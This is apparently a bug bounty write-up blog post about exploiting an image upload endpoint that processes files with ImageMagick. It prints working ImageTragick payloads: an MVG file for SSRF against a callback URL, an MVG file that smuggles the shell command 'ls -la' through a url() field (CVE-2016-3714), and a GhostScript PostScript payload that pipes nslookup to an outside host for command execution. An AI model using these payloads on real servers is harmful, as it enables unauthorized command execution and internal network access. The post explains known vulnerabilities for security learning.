Posts Unrestricted File Upload Leads to SSRF and RCE
Post
Cancel

Unrestricted File Upload Leads to SSRF and RCE

Muhammad Adel Oct 11, 2021 2021-10-11T19:40:00+02:00
Nov 10, 2021 2021-11-10T18:32:33+02:00 2 min

Introduction

Peace be upon you all, I am going to share with you a vulnerability that I have found almost a year ago and it is remarkable for me because it was the first critical one for me anyway let’s jump in.

ImageMagick

It is a package commonly used by web services to process images. A number of image processing plugins depend on the ImageMagick library, including, but not limited to, PHP’s imagick, Ruby’s rmagick and paperclip, and nodejs’s imagemagick.. it has been commonly exploited in 2016 when Nikolay Ermishkin from the Mail.Ru Security Team discovered several vulnerabilities in it under the CVEs (CVE-2016-3714 - CVE-2016-3718 - CVE-2016-3715 - CVE-2016-3716 - CVE-2016-3717). you can know more information about the vulnerability form here:
https://imagetragick.com/

The Finding

I was testing the target for a couple of days and I was able to find multiple trivial XSS that gives me an indication that this target didn’t test well before. Also, the target was running with PHP and I love it as Bug Hunter :). I looked for the file upload vulnerability and I started by sending it to Burp plugin which test the file upload vulnerability. after some minutes I saw that red message saying the target is vulnerable to CVE-2016-3714. great, it is time for validating.

SSRF via CVE-2016-3718

I will setup burp collaborator to receive the connection then simply add the following payload and replace it with your web server URL:

1
2
3
4

push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context

RCE via CVE-2016-3714

Now, we have confirmed that it is using the image magic library and it is vulnerable to SSRF so let’s try to get RCE.

1
2
3
4

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context

I tried it but it didn’t give back anything. maybe it is blind?

Great it is working perfectly!!

RCE via GhostScript

After digging deeper I found that it is also vulnerable to ghostscript vulnerability which also will allow us to get RCE. let’s see the following payload:

1
2
3
4
5
6

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%nslookup <url>) currentdevice putdeviceprops

Conclusion

I hope you enjoyed reading this and if you have any question feel free to ping me any time, Happy Hunting!

Bug Hunting
bug hunting web writeups
This post is licensed under CC BY 4.0 by the author.
Recent Update
Contents

I owe your Request | HTTP Request Smuggling leads to Full Accounts takeover

Hackerone Android Challenges Writeups